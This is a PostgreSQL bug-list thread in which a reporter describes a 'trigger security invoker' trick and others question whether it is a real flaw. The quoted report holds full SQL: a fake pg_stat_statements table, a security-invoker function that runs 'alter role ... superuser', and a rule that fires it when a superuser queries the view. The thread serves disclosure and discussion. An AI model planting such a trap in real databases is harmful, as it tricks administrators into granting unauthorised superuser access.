Re: BUG #13651: trigger security invoker attack

And what would be an acceptable solution/behavior in your eyes?

On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <digoal@126.com> wrote:

>
> The point is:
>    Superuser will be trick possible. like phishing sites.
>   FOR EXP:
>      DBA, or some monitor / admin software query these table or view.
>
> --
> =E5=85=AC=E7=9B=8A=E6=98=AF=E4=B8=80=E8=BE=88=E5=AD=90=E7=9A=84=E4=BA=8B,=
I'm Digoal,Just Do It.
>
> =E5=9C=A8 2015-09-30 10:01:12=EF=BC=8C"David G. Johnston" <david.g.johnst=
on@gmail.com
> <javascript:_e(%7B%7D,'cvml','david.g.johnston@gmail.com');>> =E5=86=99=
=E9=81=93=EF=BC=9A
>
> On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <digoal@126.com
> <javascript:_e(%7B%7D,'cvml','digoal@126.com');>> wrote:
>
>> a normal user get super privilege, use security invoker function.
>> postgres=3D> create table pg_stat_statements (
>>  userid oid              ,
>>  dbid                oid      ,
>>  queryid             bigint      ,
>>  query               text           ,
>>  calls               bigint      ,
>>  total_time          double precision ,
>>  rows                bigint           ,
>>  shared_blks_hit     bigint   ,
>>  shared_blks_read    bigint    ,
>>  shared_blks_dirtied bigint     ,
>>  shared_blks_written bigint      ,
>>  local_blks_hit      bigint       ,
>>  local_blks_read     bigint          ,
>>  local_blks_dirtied  bigint        ,
>>  local_blks_written  bigint         ,
>>  temp_blks_read      bigint          ,
>>  temp_blks_written   bigint           ,
>>  blk_read_time       double precision ,
>>  blk_write_time      double precision );
>>
>> postgres=3D> create or replace function f() returns pg_stat_statements a=
s
>> $$
>> declare
>> begin
>>   alter role digoal superuser;
>> end;
>> $$ language plpgsql security invoker;
>> CREATE FUNCTION
>>
>> postgres=3D> create rule "_RETURN" as on select to pg_stat_statements do
>> instead select * from f();
>> CREATE RULE
>>
>> When a super user select the view pg_stat_statements , the normal user
>> digoal will granted the superuser role.
>>
>> Yes, it's a normal operation ,but somebody can use these trick.
>>
>
>
> Everything you just wrote was done as superuser so what's your point?
>
> David J.
>
>